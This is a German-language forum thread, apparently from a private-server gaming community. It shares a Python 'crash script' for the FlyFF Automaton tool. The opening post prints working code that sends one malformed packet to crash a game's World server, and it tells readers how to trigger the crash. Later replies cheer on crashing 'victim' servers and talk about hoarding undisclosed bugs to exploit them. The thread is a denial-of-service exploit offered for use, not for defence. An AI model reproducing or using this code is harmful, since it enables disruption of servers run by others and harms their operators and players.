Es gibt mal wieder ein neues Crash Script.
Dafür benötigt ihr den Automaton v1.2.x.x.
Ersetzt diesen Inhalt mit dem in der Example.atpy !Code:########################################################################################################### ########################################################################################################### ################################ FlyFF Automaton - Crash Script (Python) ################################## ############################ Copyright (C) 2009 by dBased. All rights reserved. ########################### ########################################################################################################### ########################################################################################################### # Imports import struct from Automaton.Game import * from Automaton.System import AddCommand # Crash on unprotected server def Crash(arguments, device): # Try to fetch the current target target = GetTarget () or GetPlayer () if ( not target ): device.Log ( 'Could not fetch a target!' ) return True # Setup the packet and send it device.Log ( 'Crashing server!' ) packet = struct.pack ( '<LLLLLL', 0xffffffff, 0x00ff0014, 0x1d, target.Numeric, 0, 1000 ) Send ( packet ) # Module initialization AddCommand ( Crash, 'Crash', '', 'Crash the server!' )
Geht online gibt @Crash ein und freut euh wen der Worldserver abstürzt.
Wichtig hierbei ist zu beachten das ihr keine Objekte/Spieler/Npcs anvisiert habt.
Quelle: [Um Links zu sehen registriere dich bitte. Klicke hier.]
Bug gefunden von nForce aka. dBased
Yay Danke Yannick :)
Mal sehen wie die Server das unterbinden wollen :)
Naja das ist ein Witz gegen Statstacking/Bank crash.
Ich sag nicht welche funktion der Packet_typ gehört :)
Aber es ist eine Grundfunktion die man nicht einfach so deaktivieren kann :D
Das geile ist aber er crasht schon nach einen einzigen packet :P
Werde es sofort testen :P
Gut thanks für deine mühe :) dennoch in einigen Wochen wird ein Fix released glaub mir :P^^
Besucht den offiziellen M-Core Ts3.: ts.mmorpg-core.com
Ich finde es auch gut, dass es leechenden Servern etwas sehr schwerer gemacht wird :>
Danke Yannick ;)
Dank lieber nForce dafür :D er hat den bug ja schlieslich entdeckt.
Aber mal schauen vielleicht release ich in nächster zeit noch eigens gefundene Bugs. Will sie aber noch etwas ausnutzen ^-^
Haha..
Klingt ja interessant, :P
kannst uns ja schonmal erzählen, was man durch die Bugs alles machen kann? =P
Aber eine frage hab ich mal, undzwar wie findest du die Bugs herraus, probierst du einfach blöd rum oder wie??
Aber danke ne :D
MFG![]()
Bugs bleiben geheim.
Und ja ich teste einfach nur rum anderst kommt man nicht an die bugs heran =)
can someone translate it on english (how to use it) plx
thx
ehm lol..ich probiere das auf meinem server und der crasht kein bisschen O_O..habe das auch mal auf der f taste gemacht und XXXX male gesendet..es passiert nix..kann trotzdem chatten, sachen kaufen etc und keine error logs erscheinen und kein server krepiert..xD
Hattest du ein Mover / Gegenstand im Target ? Wen ja crasht der server nicht.
abgesehen von deinen Methoden kenn ich noch eine bisher unbekannte worauf auch nich jeder so schnell kommt :D
danke yannik fürs script x3
ich gehe nie auf ragezone =P
macht ja voll bock opferserver zu crashen ;P
nette sache.
Gleich mal ausprobieren :D
Lesezeichen